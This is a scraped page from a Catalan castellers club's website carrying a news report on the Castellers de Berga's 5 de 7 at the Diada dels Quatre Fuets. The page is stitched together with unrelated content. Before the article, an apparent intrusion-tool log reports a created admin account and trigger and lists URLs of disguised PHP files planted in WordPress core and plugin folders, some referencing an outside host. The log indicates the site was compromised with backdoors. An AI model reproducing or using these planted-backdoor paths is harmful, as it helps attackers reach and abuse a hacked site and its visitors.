Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?cron https://castellersdeberga.cat/wp-admin/edit-comments-ajax-wp-ajax-wp-private-cron-stream.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/screen-wp-ajax-response-ajax-core-wp-private-core-cron-core-private-core-private.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/screen-wp-ajax-response-ajax-core-wp-private-core-cron-core-private-ajax-response-stream.php https://castellersdeberga.cat/wp-content/plugins/js_composer/vc_classmap.json-ajax-private-private-meta-wp-meta-stream.php https://castellersdeberga.cat/wp-content/plugins/js_composer/vc_classmap.json-ajax-private-private-cron-core-wp-stream-ajax-cron.php https://castellersdeberga.cat/wp-includes/class-requests-ajax-stream-stream-private-stream-cron.php https://castellersdeberga.cat/wp-includes/IXR/class-IXR-value-private-private-core-meta.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Els Castellers de Berga estrenen el 5 de 7, a la Diada dels Quatre Fuets
 

Els Castellers de Berga estrenen el 5 de 7, a la Diada dels Quatre Fuets


Els Castellers de Berga estrenen el 5 de 7, a la Diada dels Quatre FuetsEls Castellers de Berga descarreguen 3 castells de 7 pisos per primer cop aquesta temporada. En una Diada dels Quatre Fuets on el termòmtre ha marcat els 35ºC a la Plaça de Sant Pere, a Berga. Els Castellers de Berga han estrenat, en segona ronda, el 5 de 7 aquesta temporada. De fet, des del 20 de juliol de 2019 (amb la inactivitat degut a la COVID-19 entremig) que els Castellers de Berga no descarregaven 3 castells de 7 en la mateixa diada. A més, és la sisena Diada dels Quatre Fuets consecutiva on els berguedans descarreguen el 5 de 7, convertint-se aquest en el castell més repetit en la diada d’abans de la Patum.

La diada ha començat amb els pilars caminant de les 3 colles. Han començat els Castellers de Berga alçant un pilar de dol, en record al pare de la cap de colla, que ha mort recentment. En primera ronda, els de Berga han descarregat el quart 3 de 7 de la temporada, l’ha seguit l’estrena del 5 de 7 i han tancat descarregant el 4 de 7, després d’un intent desmontat. 3 pilars de 4 simultanis han tancat la Diada dels Quatre Fuets.

Per la seva banda, els Capgrossos de Mataró han descarregat el 4 de 8, el 2 de 7 (primer de la temporada) i el 3 de 7. Els Minyons de Terrassa han descarragat el 4 de 8, el 3 de 8 i el 5 de 7.